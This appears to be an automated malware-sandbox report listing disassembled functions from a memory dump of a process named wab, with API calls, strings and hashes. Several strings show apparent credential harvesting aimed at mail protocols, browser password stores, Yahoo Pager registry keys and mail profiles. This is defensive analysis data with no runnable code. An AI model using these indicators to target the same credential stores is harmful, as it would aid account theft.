                                                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                  • _strcmpi.MSVCRT ref: 00404518
                                                                                  • _strcmpi.MSVCRT ref: 00404536
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcmpi$memcpystrlen
                                                                                  • String ID: imap$pop3$smtp
                                                                                  • API String ID: 2025310588-821077329
                                                                                  • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                  • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                  • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                  • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040C02D
                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                  • API String ID: 2726666094-3614832568
                                                                                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403A88
                                                                                  • memset.MSVCRT ref: 00403AA1
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                  • strlen.MSVCRT ref: 00403AE9
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1786725549-0
                                                                                  • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                  • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                  • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                  • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2014771361-0
                                                                                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memcmp.MSVCRT ref: 00406151
                                                                                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                                                  • memcmp.MSVCRT ref: 0040617C
                                                                                  • memcmp.MSVCRT ref: 004061A4
                                                                                  • memcpy.MSVCRT ref: 004061C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp$memcpy
                                                                                  • String ID: global-salt$password-check
                                                                                  • API String ID: 231171946-3927197501
                                                                                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                  • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                  • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                  • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                  • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                  • EndPaint.USER32(?,?), ref: 004016F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                  • String ID:
                                                                                  • API String ID: 19018683-0
                                                                                  • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                  • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                  • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                  • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040644F
                                                                                  • memcpy.MSVCRT ref: 00406462
                                                                                  • memcpy.MSVCRT ref: 00406475
                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                                                  • memcpy.MSVCRT ref: 004064B9
                                                                                  • memcpy.MSVCRT ref: 004064CC
                                                                                  • memcpy.MSVCRT ref: 004064F9
                                                                                  • memcpy.MSVCRT ref: 0040650E
                                                                                    • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID:
                                                                                  • API String ID: 438689982-0
                                                                                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0044495F
                                                                                  • memset.MSVCRT ref: 00444978
                                                                                  • memset.MSVCRT ref: 0044498C
                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                  • strlen.MSVCRT ref: 004449A8
                                                                                  • memcpy.MSVCRT ref: 004449CD
                                                                                  • memcpy.MSVCRT ref: 004449E3
                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                  • memcpy.MSVCRT ref: 00444A23
                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset$strlen
                                                                                  • String ID:
                                                                                  • API String ID: 2142929671-0
                                                                                  • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                  • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                  • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                  • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                  • memset.MSVCRT ref: 0040330B
                                                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                  • strchr.MSVCRT ref: 0040335A
                                                                                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                  • strlen.MSVCRT ref: 0040339C
                                                                                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                  • String ID: Personalities
                                                                                  • API String ID: 2103853322-4287407858
                                                                                  • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                  • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                  • memcpy.MSVCRT ref: 004108C3
                                                                                  Strings
                                                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FromStringUuid$memcpy
                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                  • API String ID: 2859077140-3316789007
                                                                                  • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                  • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                  • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                  • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00444573
                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValuememset
                                                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                  • API String ID: 1830152886-1703613266
                                                                                  • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                  • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                  • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                  • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastMessagesprintf
                                                                                  • String ID: Error$Error %d: %s
                                                                                  • API String ID: 1670431679-1552265934
                                                                                  • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                  • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                  • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                  • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                  • API String ID: 3510742995-272990098
                                                                                  • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                  • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                  • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                  • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: H
                                                                                  • API String ID: 2221118986-2852464175
                                                                                  • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                  • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                  • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                  • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                  • API String ID: 3510742995-3170954634
                                                                                  • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                  • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                  • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                  • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp$memcpy
                                                                                  • String ID: @ $SQLite format 3
                                                                                  • API String ID: 231171946-3708268960
                                                                                  • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                  • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                  • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                  • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID: winWrite1$winWrite2
                                                                                  • API String ID: 438689982-3457389245
                                                                                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: winRead
                                                                                  • API String ID: 1297977491-2759563040
                                                                                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: gj
                                                                                  • API String ID: 1297977491-4203073231
                                                                                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                  • memset.MSVCRT ref: 0040AB9C
                                                                                    • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                  • sprintf.MSVCRT ref: 0040ABE1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                  • API String ID: 3337535707-2769808009
                                                                                  • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                  • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                  • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                  • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 004090C2
                                                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
